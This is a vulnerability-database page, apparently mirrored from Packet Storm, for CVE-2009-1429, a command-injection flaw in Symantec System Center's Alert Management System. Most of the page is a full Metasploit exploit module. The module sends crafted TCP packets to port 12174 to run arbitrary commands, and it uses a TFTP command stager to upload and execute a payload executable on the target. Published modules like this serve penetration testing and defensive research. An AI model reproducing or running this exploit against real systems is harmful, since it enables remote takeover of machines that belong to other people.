Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution

🗓️ 21 Aug 2011 00:00:00Reported by MCType

packetstorm🔗 packetstormsecurity.com👁 39 Views

Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution vulnerabilit

Reporter	Title	Published	Views	Family All 15
0day.today	Symantec System Alert Management System (xfr.exe) Command Execution	20 Aug 201100:00	–	zdt
Circl	CVE-2009-1429	28 Apr 200900:00	–	circl
Check Point Advisories	Symantec System Center Alert Management System Arbitrary Command Execution - Ver2 (CVE-2009-1429)	28 Dec 201400:00	–	checkpoint_advisories
CVE	CVE-2009-1429	29 Apr 200915:00	–	cve
Cvelist	CVE-2009-1429	29 Apr 200915:00	–	cvelist
d2	DSquare Exploit Pack: D2SEC_SYMIAO	29 Apr 200915:30	–	d2
Exploit DB	Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution (Metasploit)	19 Aug 201100:00	–	exploitdb
Tenable Nessus	Intel Common Base Agent CreateProcessA() Function Remote Command Execution	3 May 200900:00	–	nessus
Metasploit	Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution	19 Aug 201118:35	–	metasploit
NVD	CVE-2009-1429	29 Apr 200915:30	–	nvd

`##  
# $Id: ams_xfr.rb 13591 2011-08-19 18:35:29Z mc $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
include Msf::Exploit::CmdStagerTFTP  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',  
'Description' => %q{  
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability  
because the application fails to properly sanitize user-supplied input.  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 13591 $',  
'References' =>  
[  
[ 'CVE', '2009-1429' ],  
[ 'BID', '34671' ],  
[ 'OSVDB', '54157' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-060/' ],  
[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]  
],  
'Targets' =>  
[  
[ 'Windows Universal',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'win'  
}  
]  
],  
'Privileged' => 'true',  
'Platform' => 'win',  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 28 2009'))  
  
register_options(  
[  
Opt::RPORT(12174),  
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),  
], self.class)  
end  
  
def windows_stager  
  
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"  
  
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")  
execute_cmdstager({ :temp => '.'})  
@payload_exe = payload_exe  
  
print_status("Attempting to execute the payload...")  
execute_command(@payload_exe)  
  
end  
  
def execute_command(cmd, opts = {})  
  
connect  
  
len = 2 + cmd.length  
  
data = [0x00000000].pack('V')  
data << len.chr  
data << "\x00"  
data << cmd + " "  
data << "\x00"  
  
sock.put(data)  
  
res = sock.get_once  
  
if (!res)  
print_error("Did not recieve data. Failed?")  
else  
print_status("Got data, execution successful!")  
end  
  
disconnect  
  
end  
  
def exploit  
  
if not datastore['CMD'].empty?  
print_status("Executing command '#{datastore['CMD']}'")  
execute_command(datastore['CMD'])  
return  
end  
  
case target['Platform']  
when 'win'  
windows_stager  
else  
raise RuntimeError, 'Target not supported.'  
end  
  
handler  
  
end  
end  
`

21 Aug 2011 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.89615